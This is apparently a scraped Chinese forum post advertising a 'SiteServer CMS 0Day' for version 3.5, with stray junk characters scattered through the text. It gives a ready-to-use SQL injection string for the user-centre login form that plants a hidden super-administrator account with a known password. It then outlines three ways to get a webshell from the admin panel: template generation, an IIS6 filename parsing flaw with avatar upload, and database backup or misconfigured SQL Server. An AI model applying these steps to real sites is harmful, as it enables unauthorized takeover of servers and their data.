SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

7 P* w2 ]& ~7 E$ O- U+ I! e; w. S! fstieserver官网:www.siteserver.cn
" O; @1 _9 w1 w9 e% Y, S# v- n
5 X: y; g' {8 C7 c. f" X5 f

EXP:

直接访问UserCenter/login.aspx
" S1 N* r* L) Q( a
# m2 a! S# E" n# ~7 i
: }" c/ ?5 i/ j8 t
用户名处输入：
2 y) o. N' E& a& F, y  t
- ?, Q  P" k  b/ j* D) v: p123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

3 A# w$ |  X  j5 q

密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

5 o" G$ O4 S' e' l
7 o9 S1 m8 u# `: V$ }
之后再访问后台SiteServer/login.aspx用插入的用户登陆



后台拿webshell的三种方法：

% w( Z; x9 @9 W9 @- g一、
9 ]' P) ?  r. r5 i
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
& H  \- g. F  a0 W! y) Y
! |7 m! \7 m( @' ]" E+ P5 d9 X7 G2 T二、
  j* s$ |3 J& E, ]: ]* v
成员权限-》添加用户-》用户名为：1.asp
) p) L2 Z* w: ?; i/ |% H
http://127.0.0.1/usercenter/
  J" t' U$ a  K# ~, Q2 B. |! U3 ~
+ c) h9 ]0 @$ Y/ n用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
' L( M$ d( L/ S+ T6 D
# v1 u/ I3 i. _, Q% g* B& N（ps：后台添加用户时不会验证是否含有非法字符）
% g6 S) e8 q. ]/ I& m
' u, T) S) [( v: ^三、
: E, U  e" ^! p6 S: v# c
* N: {: g  [2 {系统工具-》实用工具-》机器参数查看
& m/ h- a4 g$ j可以看到数据库类型、名称，WEB路径

2 U7 e- f2 k- r( R7 S系统工具-》数据库工具-》SQL语句查询
# F0 X% Q: W7 n5 @: X这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

. R1 ^5 T& L+ w! t- Q